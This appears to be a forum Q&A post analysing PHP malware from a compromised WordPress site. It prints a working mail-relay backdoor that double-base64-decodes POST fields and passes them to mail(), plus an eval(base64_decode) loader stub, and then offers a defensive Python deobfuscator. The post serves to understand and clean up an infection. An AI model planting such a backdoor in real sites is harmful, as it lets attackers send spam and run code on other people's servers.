PHP attack on a server, what is this code doing?
So I've been helping someone whose WordPress site on a GoDaddy server was hit by malware. I think I've removed the code that was causing the problem, but I'm just curious what this PHP is doing; it looks like it loops through the variables stored in POST, tries to decode whatever information is in there, and then sends it by email. Can anyone help me understand this? Cheers
<?php
// Collect every POST value, in submission order, into $data.
// Index 0 is a dummy empty string, so the first real value lands at $data[1].
$data = array('');
foreach ($_POST as $key => $value) {
    array_push($data, $value);
}
// Each field arrives base64-encoded twice; decode both layers and strip escaping slashes.
$jxWnO       = stripslashes(base64_decode(base64_decode($data[1])));   // recipient address(es)
$e2WPWta     = stripslashes(base64_decode(base64_decode($data[2])));   // subject
$hwrDZxfxhl  = stripslashes(base64_decode(base64_decode($data[3])));   // message body
$JQiQiWf3Pg  = stripslashes(base64_decode(base64_decode($data[4])));   // additional headers (e.g. From:)
// Send the mail with the attacker-supplied fields and report the result back to the caller.
$Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
if ($Fr2ZEIZYuKj) {
    echo $Fr2ZEIZYuKj;   // mail() returned true: prints "1"
} else {
    echo '99';           // failure marker the sender can check for
}
?>
Then, in a separate file:
<?php $code=base64_decode("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"); eval("return eval(\"$code\");") ?>
If you run `base64_decode()` on `$code` you'll find a big hex-obfuscated string (e.g. `\$_f2ddadb0dd5067b83c2044966c041bac = array(''); \x66\x6F\x72\x65\x61\x63\x68`) that is certainly malicious but hard to translate into something readable. In the end it is `eval()`'d. The `mail()` call here is probably just a callback to let the attacker know it succeeded, but whatever this thing actually does is in that obfuscated eval'd code. –
Probably (an educated guess based on knowledge and experience, not on actually decoding what's posted here), the stuff from `$_POST` forms a command interface to a large eval'd piece of malicious code. –
The separate file: does it include/require the file with the `$_POST` stuff? If not, the relationship between the two is unclear, since nothing in the `$_POST`/`mail()` code evaluates anything. –
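As an added, defender-side example (not code from the question or from any of the comments), the Python below reproduces the mailer's double `base64_decode` statically so captured POST values can be read back, and unwraps an `eval(base64_decode("..."))` loader together with the `\xNN` escapes the first comment mentions, without ever executing the payload. All sample values are constructed stand-ins; the real payload from the page is not reproduced.

```python
import base64
import re

# Constructed samples (hypothetical data, not the payload from the page):
# a POST value encoded twice, as the mailer script expects, and a small
# stand-in for the hex-escaped code the commenter saw after decoding $code.
SAMPLE_POST_VALUE = base64.b64encode(base64.b64encode(b"victim@example.com")).decode()
SAMPLE_HEX_PHP = r'$_f = array(""); \x66\x6F\x72\x65\x61\x63\x68 ($_POST as $k => $v) { \x65\x76\x61\x6C($v); }'
SAMPLE_LOADER = '<?php $code=base64_decode("%s"); eval($code); ?>' % (
    base64.b64encode(SAMPLE_HEX_PHP.encode()).decode())

# Constructs worth flagging once the layers are peeled away
SUSPICIOUS = ("eval(", "base64_decode(", "mail(", "$_POST", "stripslashes(", "foreach")

def is_text(data: bytes) -> bool:
    """True when every byte is printable ASCII or common whitespace."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)

def peel_base64(value: str, max_layers: int = 5) -> tuple[bytes, int]:
    """Strip nested base64 layers statically (never eval). Returns (bytes, layers)."""
    data, layers = value.encode(), 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(data, validate=True)
        except ValueError:  # binascii.Error: not base64, so this was the last layer
            break
        if not decoded or not is_text(decoded):
            break  # stop once the result no longer looks like text or more base64
        data, layers = decoded, layers + 1
    return data, layers

def unescape_php_hex(src: str) -> str:
    r"""Resolve \xNN escapes the way PHP does inside double-quoted strings."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), src)

def deobfuscate_loader(php_src: str) -> str:
    """Unwrap an eval(base64_decode("...")) loader and its hex escapes, statically."""
    m = re.search(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', php_src)
    inner = php_src if m is None else peel_base64(m.group(1))[0].decode("utf-8", "replace")
    return unescape_php_hex(inner)

def flag_suspicious(src: str) -> list[str]:
    """List the risky constructs present after de-obfuscation."""
    return [token for token in SUSPICIOUS if token in src]

def decode_mailer_fields(post_values: list[str]) -> dict[str, str]:
    """Reproduce the mailer's double base64_decode to see what mail() would send."""
    names = ("to", "subject", "message", "headers")
    return {name: base64.b64decode(base64.b64decode(raw)).decode("utf-8", "replace")
            for name, raw in zip(names, post_values)}
```

Run `deobfuscate_loader()` on a suspect file's contents and `decode_mailer_fields()` on POST values recovered from logs or a capture to see, respectively, what the loader would have eval'd and what the mailer would have sent.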